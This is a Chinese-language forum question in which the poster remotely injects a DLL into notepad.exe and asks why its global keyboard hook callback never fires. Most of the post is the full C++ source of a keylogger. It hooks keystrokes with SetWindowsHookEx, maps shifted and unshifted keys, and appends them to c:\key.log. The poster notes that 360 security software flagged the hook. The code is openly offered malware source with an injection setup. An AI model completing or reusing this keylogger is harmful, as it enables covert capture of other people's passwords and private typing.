一个写在dll里面的钩子的问题。
我运用远程注入的方法,假设在进程 “notepad.exe”中注入 一个dll。
我在dll 是用win32 写的。 功能是: 挂了一个钩子,可以捕获键盘信息,然后把信息写入一个文件夹中!
问题来了: 我现在是能注入到这个进程之中, 360防护也提示有钩子安装,但是我允许安装钩子之后,然后就没反应了!
好像都没有进入到钩子的回调函数, 我在回调函数里面放了一个Messagebox 都没有效果。 这到底是为什么?
我这个钩子是能用的,我是从其他的程序上面差不多移植过来的。 求做过的朋友指导一下!
程序和系统都是x64。
代码如下如下:
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
{
MessageBox( NULL, ("DLL已进入目标进程。"), ("信息"), MB_ICONINFORMATION );
start();
}
break;
case DLL_PROCESS_DETACH:
{
stop();
MessageBox( NULL, ("DLL已从目标进程卸载。"), ("信息"), MB_ICONINFORMATION );
}
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
#pragma data_seg("ShareData")
HHOOK hKeyBoardHook=NULL; //keyboar hook
HINSTANCE glhInstance=NULL; //globle instance
HWND hOutPutWnd=NULL; //Display Pass Wnd
#pragma data_seg()
void SaveLog(char*c)
{
//name.Format(_T("c:\\Key_%d_%d.log"),tm.GetMonth(),tm.GetDay());
FILE *file;
file=fopen("c:\\key.log","ab+");
if(file==NULL)
{
printf("错误!");
exit(1); //中止程序
}
//file.SeekToEnd();
fseek(file,0,SEEK_END);
//file.Write(c,1);
fwrite(c,1,1,file);
fclose(file);
}
LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam)
{
LRESULT Result=CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
MessageBox( NULL,"我现在在回调函数中",("信息"), MB_ICONINFORMATION);
if(nCode==HC_ACTION)
{
if((lParam&0xc000ffff)==1) //keydown事件发生时
{
/*char key[20];
GetKeyNameText(lParam,key,20);*/
char *sName="";
BOOL b_sft=::GetAsyncKeyState (VK_SHIFT)>>((sizeof(short)*8)-1);
if(b_sft)
{
switch(wParam)
{
case '1':sName="!"; break;
case '2':sName="@"; break;
case '3':sName = "#";break;
case '4':sName = "$";break;
case '5':sName = "%";break;
case '6':sName = "^";break;
case '7':sName = "&";break;
case '8':sName = "*";break;
case '9':sName = "(";break;
case '0':sName = ")";break;
case 'A':sName = "A";break;
case 'B':sName = "B";break;
case 'C':sName = "C";break;
case 'D':sName = "D";break;
case 'E':sName = "E";break;
case 'F':sName = "F";break;
case 'G':sName = "G";break;
case 'H':sName = "H";break;
case 'I':sName = "I";break;
case 'J':sName = "J";break;
case 'K':sName = "K";break;
case 'L':sName = "L";break;
case 'M':sName = "M";break;
case 'N':sName = "N";break;
case 'O':sName = "O";break;
case 'P':sName = "P";break;
case 'Q':sName = "Q";break;
case 'R':sName = "R";break;
case 'S':sName = "S";break;
case 'T':sName = "T";break;
case 'U':sName = "U";break;
case 'V':sName = "V";break;
case 'W':sName = "W";break;
case 'X':sName = "X";break;
case 'Y':sName = "Y";break;
case 'Z':sName = "Z";break;
//case '`':sName ="~";break;
}
}
else
{
switch(wParam)
{
/*0~9*/
case '1': sName="1"; break;
case '2':sName = "2";break;
case '3':sName = "3";break;
case '4':sName = "4";break;
case '5':sName = "5";break;
case '6':sName = "6";break;
case '7':sName = "7";break;
case '8':sName = "8";break;
case '9':sName = "9";break;
case '0':sName = "0";break;
/*A~Z*/
case 'A':sName = "a";break;
case 'B':sName = "b";break;
case 'C':sName = "c";break;
case 'D':sName = "d";break;
case 'E':sName = "e";break;
case 'F':sName = "f";break;
case 'G':sName = "g";break;
case 'H':sName = "h";break;
case 'I':sName = "i";break;
case 'J':sName = "j";break;
case 'K':sName = "k";break;
case 'L':sName = "l";break;
case 'M':sName = "m";break;
case 'N':sName = "n";break;
case 'O':sName = "o";break;
case 'P':sName = "p";break;
case 'Q':sName = "q";break;
case 'R':sName = "r";break;
case 'S':sName = "s";break;
case 'T':sName = "t";break;
case 'U':sName = "u";break;
case 'V':sName = "v";break;
case 'W':sName = "w";break;
case 'X':sName = "x";break;
case 'Y':sName = "y";break;
case 'Z':sName = "z";break;
}
}
switch(wParam) //数字键
{
case VK_BACK:sName="~"; break;
case VK_NUMPAD1:sName="1";break;
case VK_NUMPAD3:sName = "3";break;
case VK_NUMPAD4:sName = "4";break;
case VK_NUMPAD5:sName = "5";break;
case VK_NUMPAD6:sName = "6";break;
case VK_NUMPAD7:sName = "7";break;
case VK_NUMPAD8:sName = "8";break;
case VK_NUMPAD9:sName = "9";break;
case VK_NUMPAD0:sName = "0";break;
case VK_MULTIPLY:sName = "*";break;
case VK_ADD: sName="+";break;
case VK_SUBTRACT: sName="-"; break;
case VK_DECIMAL: sName="."; break;
case VK_DIVIDE: sName="/"; break;
}
SaveLog(sName);
}
}
return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
}
void stop()
{
UnhookWindowsHookEx(hKeyBoardHook);
}
void start()
{
hKeyBoardHook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook
,::GetModuleHandleA("DLLHOOK.dll"),0/*::GetCurrentThreadId()*/);
if(hKeyBoardHook==NULL)
{
MessageBox( NULL, ("钩子安装失败。"), ("信息"), MB_ICONINFORMATION );
}
else
{
MessageBox( NULL, ("钩子安装成功。"), ("信息"), MB_ICONINFORMATION );
}
}